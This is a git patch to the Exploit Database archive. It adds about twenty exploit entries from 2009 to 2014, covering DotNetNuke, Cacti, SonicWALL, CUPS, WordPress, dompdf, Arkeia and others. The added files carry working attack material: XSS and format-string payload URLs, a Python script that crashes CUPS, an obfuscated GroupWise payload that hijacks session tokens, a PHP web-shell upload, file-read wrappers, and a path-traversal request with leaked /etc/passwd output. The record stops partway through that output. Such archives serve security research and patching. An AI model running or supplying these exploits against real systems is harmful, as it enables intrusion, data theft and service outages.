From 7edc5785042a8bc5056972a7bc80226ff58f6177 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 26 Apr 2014 04:35:04 +0000
Subject: [PATCH] Updated 04_26_2014

---
 files.csv                           |  28 +++-
 platforms/asp/webapps/33009.txt     |   9 ++
 platforms/hardware/remote/33010.txt |  16 ++
 platforms/hardware/remote/33016.txt |  16 ++
 platforms/linux/dos/33015.c         |  22 +++
 platforms/linux/dos/33020.py        |  91 ++++++++++++
 platforms/multiple/remote/33007.txt |  38 +++++
 platforms/multiple/remote/33023.txt |  18 +++
 platforms/php/webapps/33000.txt     |   9 ++
 platforms/php/webapps/33001.ssh     |  10 ++
 platforms/php/webapps/33002.txt     |  13 ++
 platforms/php/webapps/33003.txt     |  55 +++++++
 platforms/php/webapps/33004.txt     |  47 ++++++
 platforms/php/webapps/33005.txt     | 171 +++++++++++++++++++++
 platforms/php/webapps/33006.txt     |  73 +++++++++
 platforms/php/webapps/33008.txt     |  13 ++
 platforms/php/webapps/33011.txt     |  13 ++
 platforms/php/webapps/33013.txt     |   9 ++
 platforms/php/webapps/33014.txt     |  11 ++
 platforms/php/webapps/33021.txt     |   9 ++
 platforms/php/webapps/33022.txt     |  17 +++
 platforms/windows/local/33012.c     |  17 +++
 platforms/windows/remote/32997.pl   | 223 ++++++++++++++++++----------
 platforms/windows/remote/33025.txt  |  11 ++
 24 files changed, 859 insertions(+), 80 deletions(-)
 create mode 100755 platforms/asp/webapps/33009.txt
 create mode 100755 platforms/hardware/remote/33010.txt
 create mode 100755 platforms/hardware/remote/33016.txt
 create mode 100755 platforms/linux/dos/33015.c
 create mode 100755 platforms/linux/dos/33020.py
 create mode 100755 platforms/multiple/remote/33007.txt
 create mode 100755 platforms/multiple/remote/33023.txt
 create mode 100755 platforms/php/webapps/33000.txt
 create mode 100755 platforms/php/webapps/33001.ssh
 create mode 100755 platforms/php/webapps/33002.txt
 create mode 100755 platforms/php/webapps/33003.txt
 create mode 100755 platforms/php/webapps/33004.txt
 create mode 100755 platforms/php/webapps/33005.txt
 create mode 100755 platforms/php/webapps/33006.txt
 create mode 100755 platforms/php/webapps/33008.txt
 create mode 100755 platforms/php/webapps/33011.txt
 create mode 100755 platforms/php/webapps/33013.txt
 create mode 100755 platforms/php/webapps/33014.txt
 create mode 100755 platforms/php/webapps/33021.txt
 create mode 100755 platforms/php/webapps/33022.txt
 create mode 100755 platforms/windows/local/33012.c
 create mode 100755 platforms/windows/remote/33025.txt

diff --git a/files.csv b/files.csv
index 1b498de08..15c43c928 100755
--- a/files.csv
+++ b/files.csv
@@ -12565,7 +12565,7 @@ id,file,description,date,author,platform,type,port
 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0
 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0
-14339,platforms/linux/local/14339.sh,"Ubuntu PAM MOTD Local Root Exploit",2010-07-12,anonymous,linux,local,0
+14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@@ -12931,7 +12931,7 @@ id,file,description,date,author,platform,type,port
 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0
 14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0
 14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0
-14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
+14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
 14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0
 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
@@ -29742,4 +29742,26 @@ id,file,description,date,author,platform,type,port
 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0
 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0
 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
-32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Dursun Ince",php,webapps,0
+32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0
+33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 'data_input.php' Cross Site Scripting Vulnerability",2009-05-15,fgeek,php,webapps,0
+33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability",2009-05-20,inking,php,webapps,0
+33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0
+33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80
+33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php, read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80
+33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80
+33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443
+33007,platforms/multiple/remote/33007.txt,"Novell GroupWise <= 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0
+33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-05-22,Securitylab.ir,php,webapps,0
+33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0
+33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0
+33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0
+33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
+33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 'updatecheck.php' Cross Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0
+33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
+33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
+33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
+33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
+33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
+33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
+33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0
+33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0
diff --git a/platforms/asp/webapps/33009.txt b/platforms/asp/webapps/33009.txt
new file mode 100755
index 000000000..c102577d7
--- /dev/null
+++ b/platforms/asp/webapps/33009.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35074/info
+
+DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects versions prior to DotNetNuke 4.9.4. 
+
+http://www.example.com/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.example.net/XSS.html%22%3 
\ No newline at end of file
diff --git a/platforms/hardware/remote/33010.txt b/platforms/hardware/remote/33010.txt
new file mode 100755
index 000000000..ae7027ad5
--- /dev/null
+++ b/platforms/hardware/remote/33010.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35093/info
+
+SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
+
+Global VPN Client 4.0.0.2-51e Standard and Enhanced are vulnerable; other versions may also be affected. 
+
+The following proofs of concept are available:
+
+1. CFS: Add example.com to your "Forbidden Domains" and access http://www.example.com/%s%s%s%s%s%s/.
+
+2. GroupVPN: Establish a GroupVPN Tunnel and enter at the XAUTH Username %s%s%s%s%s.
+
+3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s%s%s%s%s
+
diff --git a/platforms/hardware/remote/33016.txt b/platforms/hardware/remote/33016.txt
new file mode 100755
index 000000000..3d932451f
--- /dev/null
+++ b/platforms/hardware/remote/33016.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35145/info
+
+Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+Attackers may exploit this issue to run arbitrary code in the context of the affected application. Failed attempts may cause denial-of-service conditions.
+
+The following are vulnerable:
+
+SSL-VPN 200 firmware prior to 3.0.0.9
+SSL-VPN 2000 firmware prior to 3.5.0.5
+SSL-VPN 4000 firmware prior to 3.5.0.5 
+
+
+https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
+https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
+https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n 
\ No newline at end of file
diff --git a/platforms/linux/dos/33015.c b/platforms/linux/dos/33015.c
new file mode 100755
index 000000000..5e02cd52d
--- /dev/null
+++ b/platforms/linux/dos/33015.c
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/35143/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause an affected process to hang, denying service to legitimate users. Other denial-of-service attacks are also possible.
+
+This issue was introduced in Linux Kernel 2.6.19. The following versions have been fixed:
+
+Linux Kernel 2.6.30-rc3
+Linux Kernel 2.6.27.24
+Linux Kernel 2.6.29.4 
+
+    pipe(pfds);
+    snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
+    fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);
+
+    if (fork()) {
+        splice(pfds[0], NULL, fd, NULL, 1024, NULL);
+    } else{
+        sleep(1);
+        splice(pfds[0], NULL, fd, NULL, 1024, NULL);
+    }
diff --git a/platforms/linux/dos/33020.py b/platforms/linux/dos/33020.py
new file mode 100755
index 000000000..90881927b
--- /dev/null
+++ b/platforms/linux/dos/33020.py
@@ -0,0 +1,91 @@
+source: http://www.securityfocus.com/bid/35169/info
+
+CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+from struct import pack
+import sys
+import socket
+
+class IppRequest:
+    """
+    Little class to implement a basic Internet Printing Protocol
+    """
+    def __init__(self, host, port, printers, hpgl_data="a"):
+        self.printers = printers
+        self.host = host
+        self.port = port
+        self.hpgl_data = hpgl_data
+        self.get_ipp_request()
+
+    def attribute(self, tag, name, value):
+        data =  pack('>B',tag)
+        data += pack('>H',len(name))
+        data += name
+        data += pack('>H',len(value))
+        data += value
+        return data
+
+    def get_http_request(self):
+        http_request = "POST /printers/%s HTTP/1.1\r\n" % self.printers
+        http_request += "Content-Type: application/ipp\r\n"
+        http_request += "User-Agent: Internet Print Provider\r\n"
+        http_request += "Host: %s\r\n" % self.host
+        http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
+        http_request += "Connection: Keep-Alive\r\n"
+        http_request += "Cache-Control: no-cache\r\n"
+        return http_request
+
+    def get_ipp_request(self):
+        operation_attr =  self.attribute(0x47, 'attributes-charset', 'utf-8')
+        operation_attr += self.attribute(0x48, 'attributes-natural-language', 'en-us')
+        operation_attr += self.attribute(0x45, 'printer-uri', "http://%s:%s/printers/%s" % (self.host, self.port, self.printers))
+        operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr')
+        operation_attr += self.attribute(0x42, 'document-format', 'application/vnd.hp-HPGL')
+
+        self.ipp_data =  "\x01\x00"           # version-number: 1.0
+        self.ipp_data += "\x00\x02"           # operation-id: Print-job
+        self.ipp_data += "\x00\x00\x00\x01"   # request-id: 1
+        self.ipp_data += "\x01"               # operation-attributes-tag
+        self.ipp_data += "\x0f\x0f"           
+        # self.ipp_data += operation_attr
+        self.ipp_data += "\x02"               # job-attributes-tag
+        self.ipp_data += "\x03"               # end-of-attributes-tag
+        self.ipp_data += self.hpgl_data;
+        return self.ipp_data
+
+def main():
+
+    try:
+        printer = sys.argv[1]
+        host = sys.argv[2]
+    except:
+        print "[+] Usage: exploit printer_name host"
+        return 0
+    
+    data = "A"*100
+
+    ipp = IppRequest(host,"80", printer, data)
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    print "[+] Connecting to the host"
+    s.connect((host, 631))
+
+    #requests = ipp.get_http_request()
+    #for each in requests:
+    #    s.send(each)
+
+    print "[+] Sending request"
+    s.send(ipp.get_http_request())
+    s.send("\r\n")
+
+    print "[+] Sending ipp data"
+    s.send(ipp.get_ipp_request())
+
+    print "Response:%s" % s.recv(1024)
+    print "done!"
+
+if __name__ == "__main__":
+    sys.exit(main())
+
diff --git a/platforms/multiple/remote/33007.txt b/platforms/multiple/remote/33007.txt
new file mode 100755
index 000000000..30a0226bd
--- /dev/null
+++ b/platforms/multiple/remote/33007.txt
@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/35066/info
+
+Novell GroupWise WebAccess is prone to multiple security vulnerabilities.
+
+An attacker may leverage these issues to bypass certain security restrictions or conduct cross-site scripting attacks.
+
+Note that some of the issues may be related to BID 35061. We will update this BID as more information emerges.
+
+Versions prior to WebAccess 7.03 HP3 and 8.0.0 HP2 are vulnerable.
+
+Following harmless code uses an onload() event handler to bootstrap its payload as soon as the email
+is open.
+The first stage of this script extracts the session token (User.Context) from within the current
+document&#039;s URI and used
+to make up the second stage.
+The second injects an iframe in the current page which in turn calls the signature configuration
+interface and changes the user&#039;s signature on the fly.
+This example uses a fake target, &#039;gwwa.victim.com&#039; that must be changed with a real server
+addresss/name.
+Here, the security parser won&#039;t recognize "onload = &#039;javascript:..." as potentially unsafe just
+because of the space characters.
+
+<!--
+    <html>
+    <head>
+    </head>
+        <body onmouseover = &#039;return false;&#039; onload = &#039;javascript:var
+context=document.location.href;var token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
+        var
+malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
+        var
+malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
+        document.write(unescape(malwareS1)+token+unescape(malwareS2));return false;&#039;>
+            <br/>
+            <br/><br/>Now check your signature ...
+        </body>
+    </html>
+-->
diff --git a/platforms/multiple/remote/33023.txt b/platforms/multiple/remote/33023.txt
new file mode 100755
index 000000000..206a288b2
--- /dev/null
+++ b/platforms/multiple/remote/33023.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/35196/info
+
+Apache Tomcat is prone to a username-enumeration weakness because it displays different responses to login attempts, depending on whether or not the username exists.
+
+Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
+
+The following are vulnerable:
+
+Tomcat 4.1.x (prior to 4.1.40)
+Tomcat 5.5x (prior to 5.5.28)
+Tomcat 6.0.x (prior to 6.0.20) 
+
+The following example POST data is available:
+
+POST /j_security_check HTTP/1.1
+Host: www.example.com
+
+j_username=tomcat&j_password=% 
\ No newline at end of file
diff --git a/platforms/php/webapps/33000.txt b/platforms/php/webapps/33000.txt
new file mode 100755
index 000000000..af30311ea
--- /dev/null
+++ b/platforms/php/webapps/33000.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34991/info
+
+Cacti is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Cacti 0.8.7b are vulnerable. 
+
+http://www.example.com/cacti/data_input.php?action="><SCRIPT>alert("XSS")</SCRIPT> 
\ No newline at end of file
diff --git a/platforms/php/webapps/33001.ssh b/platforms/php/webapps/33001.ssh
new file mode 100755
index 000000000..2dd6347ff
--- /dev/null
+++ b/platforms/php/webapps/33001.ssh
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35038/info
+
+The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.
+
+Remote attackers may exploit this vulnerability to compromise an affected computer.
+
+This issue affects WebShield 1.1.0.62 and prior versions. 
+
+http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e
+
diff --git a/platforms/php/webapps/33002.txt b/platforms/php/webapps/33002.txt
new file mode 100755
index 000000000..134c3bfc6
--- /dev/null
+++ b/platforms/php/webapps/33002.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35053/info
+
+Profense Web Application Firewall is prone to multiple security-bypass vulnerabilities.
+
+An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks.
+
+Versions *prior to* the following are vulnerable:
+
+Profense 2.4.4
+Profense 2.2.22 
+
+http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
+http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/33003.txt b/platforms/php/webapps/33003.txt
new file mode 100755
index 000000000..7f39ffe35
--- /dev/null
+++ b/platforms/php/webapps/33003.txt
@@ -0,0 +1,55 @@
+# Author: nopesled
+# Date: 24/04/14
+# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
+# Company: http://wtf-fu.com/
+# Version: 1.2.1
+# Tested on: Windows 7
+# Vulnerability: Unrestricted File Upload
+
+
+Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php
+
+By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP.
+
+Append '|php':
+
+- ----------------------------123456789123456\r\n
+Content-Disposition: form-data; name="accept_file_types"\r\n
+\r\n
+jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n
+
+
+Now change the extension in the data for 'filename' to '.php' and enter your desired code like so
+
+- ----------------------------123456789123456\r\n
+Content-Disposition: form-data; name="files[]"; filename="illegal.php"\r\n
+Content-Type: application/octet-stream\r\n
+\r\n
+<?php\n
+system($_GET[\'cmd\']);\n
+?>\n
+- ----------------------------123456789123456--\r\n
+
+Submit this POST request and you will find your file in the directory:
+/wp-content/uploads/public/wtf-fu_files/default/
+
+It's not required to set the control 'deny_public_uploads' to true, because it still gets uploaded anyway regardless if it's enabled or not.
+
+###################################
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Signed.
+-----BEGIN PGP SIGNATURE-----
+Version: Keybase OpenPGP v0.1.11
+Comment: https://keybase.io/crypto
+
+wsBcBAABCgAGBQJTWQpLAAoJEOB0UMODnV4U7QIIAIKXDQVK8fIXY0BSO4ZrHq8L
+2a51JCVmpwBzrHVp87FCpYHcMXyuCXWi5joEbiJFVi5ojHTSii5ZwvBVJwvyoKcy
+jexj2IvMoC30zrgSdTu9/lMd1tYGYQCSlMubFvzE0edmDCo7fH2gF8Zvfw4Lj4ng
+KJOpB9HsvDUJVNlbDMl+MbGAW32m6BqG4ttdjE1bs1suDxb/JrS7okuHu1Qmpe0+
+Xp50x4wUVrZSeqT5VnWDWjox2BnSGEcAKbkjFeRDBpgJyeWJGH20jXb6m4sYNLDT
+gf9ml9oM5yncivMN2dJU+hp3Xyfp6rEute9jA+lcEMwZsyjlwAVFhszV4qh7X+o=
+=5nDI
+-----END PGP SIGNATURE-----
+###################################
\ No newline at end of file
diff --git a/platforms/php/webapps/33004.txt b/platforms/php/webapps/33004.txt
new file mode 100755
index 000000000..7c5109205
--- /dev/null
+++ b/platforms/php/webapps/33004.txt
@@ -0,0 +1,47 @@
+Vulnerability title: Arbitrary file read in dompdf
+CVE: CVE-2014-2383
+Vendor: dompdf
+Product: dompdf
+Affected version: v0.6.0
+Fixed version: v0.6.1 (partial fix)
+Reported by: Alejo Murillo Moyas
+
+Details:
+An arbitrary file read vulnerability is present on dompdf.php file that
+allows remote or local attackers to read local files using a special
+crafted argument. This vulnerability requires the configuration flag
+DOMPDF_ENABLE_PHP to be enabled (which is disabled by default).
+
+Using PHP protocol and wrappers it is possible to bypass the dompdf's
+"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing
+system files or other files on the webserver. Please note that the flag
+DOMPDF_ENABLE_REMOTE needs to be enabled.
+
+Command line interface:
+php dompdf.php
+php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
+
+Web interface:
+   
+http://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>
+        
+
+Further details at:
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
+
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights
+reserved worldwide. Permission is hereby granted for the electronic
+redistribution of this information. It is not to be edited or altered in
+any way without the express written consent of Portcullis Computer
+Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this
+information constitutes acceptance for use in an AS IS condition. There
+are NO warranties, implied or otherwise, with regard to this information
+or its use. Any use of this information is at the user's risk. In no
+event shall the author/distributor (Portcullis Computer Security
+Limited) be held liable for any damages whatsoever arising out of or in
+connection with the use or spread of this information.
\ No newline at end of file
diff --git a/platforms/php/webapps/33005.txt b/platforms/php/webapps/33005.txt
new file mode 100755
index 000000000..738c27df8
--- /dev/null
+++ b/platforms/php/webapps/33005.txt
@@ -0,0 +1,171 @@
+SEC Consult Vulnerability Lab Security Advisory < 20140423-0 >
+=======================================================================
+              title: Path Traversal/Remote Code Execution
+            product: WD Arkeia Virtual Appliance (AVA)
+ vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3.
+      fixed version: 10.2.9
+         CVE number: CVE-2014-2846
+             impact: critical
+           homepage: http://www.arkeia.com/
+              found: 2014-03-05
+                 by: M. Lucinskij
+                     SEC Consult Vulnerability Lab
+                     https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and
+affordable data protection for enterprises seeking to optimize the benefits of
+virtualization. The AVA offers all the features of the hardware appliance, but
+permits you to use your own choice of hardware."
+
+source:
+http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance
+
+
+Business recommendation:
+------------------------
+The identified path traversal vulnerability can be exploited by unauthenticated
+remote attackers to gain unauthorized access to the WD Arkeia virtual appliance
+and stored backup data.
+
+SEC Consult recommends to restrict access to the web interface of the WD Arkeia
+virtual appliance using a firewall until a comprehensive security
+audit based on a security source code review has been performed and all
+identified security deficiencies have been resolved by the affected vendor.
+
+
+Vulnerability overview/description:
+-----------------------------------
+The WD Arkeia virtual appliance is affected by a path traversal vulnerability.
+Path traversal enables attackers access to files and directories outside the
+web root through relative file paths in the user input.
+
+An unauthenticated remote attacker can exploit the identified vulnerability in
+order to retrieve arbitrary files from the affected system and execute system
+commands.
+
+
+Proof of concept:
+-----------------
+The path traversal vulnerability exists in the
+/opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie
+is not properly checked before including a file using the PHP include()
+function. Example of the request that demonstrates the vulnerability by
+retrieving the contents of the /etc/passwd file:
+
+POST /login/doLogin HTTP/1.0
+Host: $host
+Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00
+Content-Length: 25
+Content-Type: application/x-www-form-urlencoded
+
+password=bbb&username=aaa
+
+The response from the affected application:
+
+HTTP/1.1 200 OK
+Date: Wed, 05 Mar 2014 08:29:35 GMT
+Server: Apache/2.2.15 (CentOS)
+X-Powered-By: PHP/5.3.3
+Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/
+Cache-Control: no-cache
+Pragma: no-cache
+Charset: UTF-8
+Content-Length: 1217
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
